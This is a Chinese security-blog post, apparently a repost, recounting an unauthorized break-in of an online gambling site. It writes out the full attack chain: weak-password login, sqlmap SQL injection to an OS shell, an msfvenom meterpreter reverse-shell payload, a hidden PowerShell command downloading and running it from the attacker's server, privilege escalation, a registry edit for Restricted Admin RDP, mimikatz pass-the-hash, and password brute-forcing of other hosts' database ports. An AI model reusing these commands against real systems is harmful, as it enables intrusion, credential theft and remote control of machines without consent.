对某菠菜的简单测试
2023-5-9 10:53:21 Author: WIN哥学安全(查看原文) 阅读量:20 收藏

弱口令

闲着无聊,网上找了一个菠菜进行简单测试,并做记录,大佬们轻喷。

访问网站就是一个登录页面,试试简单的弱口令,直接进入后台。

SQL注入

翻看了很多功能点,在一处功能点发现上传接口,并尝试上传文件,发现无法上传,加了白名单。直接选择放弃,继续寻找。在某一个url参数上加上单引号,直接报错,SQL注入这不就来了么。

说干就干,直接SQLMAP神器。

发现为MSSQL,且DBA权限,直接--os-shell

上线MSF

msf生成powershell脚本,并放置在网站目录下

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=8888 -f psh-reflection >xx.ps1

vps开启监听

直接powershell上线session

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/xx.ps1'))"

如果想要通过url拼接堆叠执行powershell会存在一个问题,就是单引号闭合问题。我们可以通过对powershell进行编码一下,这样就可以绕过单引号的问题。下面推荐一个不错的网站

https://r0yanx.com/tools/java_exec_encode/ 

提权

直接getsystem获取system权限。这里推荐土豆家族提权,实战中成功率很高。

迁移一下进程,防止进程掉线。

远程登录服务器

因为是system权限,且为2012系统,大于2008版本都是无法抓到明文密码,直接修改adminnistrator密码。(实战中不推荐直接修改管理员密码)

通过hash远程登录管理员账号

因为无法获取明文密码,直接修改管理员密码稍有些不妥。尝试通过获取管理员NTLM远程登录机器。(并非同一台,这只是提供一个思路)

如果使用hash远程登录RDP,需要开启"Restricted Admin Mode"

REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f //开启Restricted Admin mode
REG query "HKLM\System\CurrentControlSet\Control\Lsa" | findstr "DisableRestrictedAdmin" //

查看是否已开启0x0则表示开启

利用mimikatz传递hash进行远程登录

sekurlsa::pth /user:administrator /domain:x.x.x.x /ntlm:4c814fa57488c76caa5ceb6e3eb0272e "/run:mstsc.exe /restrictedadmin"

成功远程管理员桌面

其他

前期发现1433端口开放着,寻找数据库配置文件,登录数据库。

通过fofa找了一下,资产还是挺多的,切很多都开放1433端口,猜测会存在同一个人部署的网站,尝试用获取的密码对这些资产的1433端口进行爆破,成功撞到几台数据库,切都是sa权限。

Taps:

文章来源:“freebuf”

扫码回复“进群”加入交流群

往期精彩

工具获取回复“burp”“awvs”“nessus”“ladon”"Forfity"等可以。

快速攻击全自动化工具JuD

Exp-Tools 1.1.3版本发布

GUI-tools渗透测试工具箱框架

阿波罗自动化攻击评估系统

 微软 Word RCE附PoC

Clash最新远程代码执行漏洞(附POC)

禅道系统权限绕过与命令执行漏洞(附POC)

【附EXP】CVE-2022-40684 & CVE-2022-22954

网络安全应急预案合集

师傅们求点赞,求支持

文章来源: http://mp.weixin.qq.com/s?__biz=MzkwODM3NjIxOQ==&mid=2247492597&idx=1&sn=4dd7bd8a62ea53aa7532e4294b6e03c6&chksm=c0c84201f7bfcb178052fb658678143bfbbf02ba0be6cbcf9e435a7933d7a2b565a6fefbf439#rd
如有侵权请联系:admin#unsafe.sh